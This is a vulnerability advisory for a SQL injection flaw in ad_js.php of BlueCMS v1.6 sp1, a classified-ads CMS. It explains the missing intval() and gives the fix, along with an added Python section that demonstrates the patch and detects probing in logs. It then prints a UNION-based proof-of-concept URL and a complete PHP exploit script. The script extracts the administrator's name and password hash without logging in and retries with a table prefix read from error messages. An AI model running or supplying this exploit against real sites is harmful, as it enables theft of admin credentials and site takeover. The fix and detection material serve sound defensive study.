BlueCMS (a CMS built for regional classified-ads portals)

Built on the most popular open-source combination of the day, PHP + MySQL
Each category can have its own Title, Keywords and Description, which helps SEO
Powerful template engine; the display style is freely definable
Multifunctional module plugins that are simple and convenient to operate
Smart caching technology improves site performance
Custom multi-attribute models give sections powerful functionality

Vulnerable file: ad_js.php

Cause of the vulnerability:

12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; // Every other file under the root directory filters its input well and wraps almost every numeric variable in intval(); only this file was missed, and it merely uses trim() to strip leading and trailing whitespace.

19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); // Concatenated straight into the query. Sigh.

Fix:

$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';
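The following is an added example written for this page, not code from the advisory or from BlueCMS. It shows in Python why the one-line fix works (intval() keeps only the leading integer, so the rest of the injected string is dropped before it reaches the query) and gives a defender a check to run over access logs for ad_js.php requests whose ad_id is not a plain integer. The php_intval() helper is an approximation of PHP's intval() written here, the table name blue_ad is assumed from the blue_admin prefix used in the PoC, and the log lines are constructed samples (one of them carries the PoC query string from this page).

```python
import re
from urllib.parse import urlsplit, parse_qs

# PoC query string from the advisory, reused here as constructed sample input.
POC_QUERY = ("ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,"
             "concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)"
             "%20from%20blue_admin%20where%20admin_id=1")

# Constructed access-log lines (common log format): one benign ad_js.php hit,
# one carrying the PoC, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/ad_js.php?ad_id=7 HTTP/1.1" 200 412',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cms/ad_js.php?' + POC_QUERY + ' HTTP/1.1" 200 388',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cms/index.php HTTP/1.1" 200 9021',
]

_LEADING_INT = re.compile(r"^\s*([+-]?\d+)")


def php_intval(value: str) -> int:
    """Approximation (assumed, written here) of PHP intval() on a string:
    parse the leading integer and discard everything after it, else return 0."""
    m = _LEADING_INT.match(value)
    return int(m.group(1)) if m else 0


def build_query(ad_id_raw: str, sanitize: bool) -> str:
    """Reproduce the SQL string ad_js.php builds.
    sanitize=False mirrors the vulnerable trim() + concatenation;
    sanitize=True mirrors the patched intval() + concatenation.
    Table name blue_ad is an assumption based on the blue_ prefix in the PoC."""
    ad_id = str(php_intval(ad_id_raw)) if sanitize else ad_id_raw.strip()
    return "SELECT * FROM blue_ad WHERE ad_id =" + ad_id


_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_ad_id_requests(lines):
    """Return (client_ip, decoded ad_id) for every ad_js.php request whose
    ad_id is not a plain integer. After the patch such requests are harmless,
    but they still indicate that someone is probing the parameter."""
    hits = []
    for line in lines:
        m = _REQ.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/ad_js.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("ad_id", []):
            if not re.fullmatch(r"[+-]?\d+", raw):
                hits.append((line.split(" ", 1)[0], raw))
    return hits


if __name__ == "__main__":
    payload = "1 and 1=2 union select 1"
    print("vulnerable:", build_query(payload, sanitize=False))
    print("patched:   ", build_query(payload, sanitize=True))
    for ip, value in suspicious_ad_id_requests(SAMPLE_LOG):
        print("non-integer ad_id from", ip, "->", value[:40])
```

intval() is enough here only because ad_id is a pure integer column; the more general fix for any string parameter in this code base is a prepared statement with a bound parameter rather than concatenation. The log check flags the attempt itself, which is what you want to alert on even on a patched install.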

Vulnerability PoC:

http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1

Right-click, view the page source, and the returned data is there.

Vulnerability Exp:
<?php
print_r('
        ------------------------------------------
        BlueCMS v1.6 sp1 "ad_js.php" SQL Injection
        get admin_user pwd-hash without login
        by CnCxzSec衰仔 http://hi.baidu.com/cncxz
        ------------------------------------------
        ');
if($argc<3){
    print_r('
        ------------------------------------------
        usage:php '.$argv[0].' host path
        host: without "http://"
        path: path to bluecms
        example:
        php '.$argv[0].' localhost /
        ------------------------------------------
        ');
    die;
}
$host=$argv[1];
$path=$argv[2];
// first attempt assumes the default table prefix blue_
$inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1";
print_r("
  • exploiting, please wait...");
$fp=fsockopen($host, 80, $errno, $errstr, 30);
if(!$fp) echo "$errstr($errno)<br />\n";
else{
    $head ="GET $path"."$inj HTTP/1.1\r\n";
    $head .="Host:".$host."\r\n";
    $head .="Connection: Close\r\n\r\n";
    $result='';
    fputs($fp,$head);
    while(!feof($fp)){
        $result .=fgets($fp,4096);
    }
    if (!eregi("document",$result)){
        // no "document" in the response: the default prefix was wrong,
        // so read the real prefix out of the error message and retry
        $temp=explode("FROM ",$result);
        if(isset($temp[1])){$temp2=explode("ad",$temp[1]);}
        if($temp2[0])
            $prefix=$temp2[0];
        print_r('

  • prefix -> '.$prefix);
        $inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20".$prefix."admin%20where%20admin_id=1";
        $fp=fsockopen($host, 80, $errno, $errstr, 30);
        if(!$fp) echo "$errstr($errno)<br />\n";
        else{
            $head ="GET $path"."$inj HTTP/1.1\r\n";
            $head .="Host:".$host."\r\n";
            $head .="Connection: Close\r\n\r\n";
            $result='';
            fputs($fp,$head);
            while(!feof($fp)){
                $result .=fgets($fp,4096);
            }
            fclose($fp);
            $rs1=strstr($result,"\"");
            $name=substr($rs1,1,strpos($rs1,"|")-1);
            $pass=substr($rs1,strpos($rs1,"|")+5,32);
            print_r('

  • we get it!');
            print_r('
            username:'.$name);
            print_r('
            pwd-hash:'.$pass);
        }
    }
    else{
        $rs1=strstr($result,"\"");
        $name=substr($rs1,1,strpos($rs1,"|")-1);
        $pass=substr($rs1,strpos($rs1,"|")+5,32);
        print_r('

  • we get it!');
        print_r('
            username:'.$name);
        print_r('
            pwd-hash:'.$pass);
    }
}
?>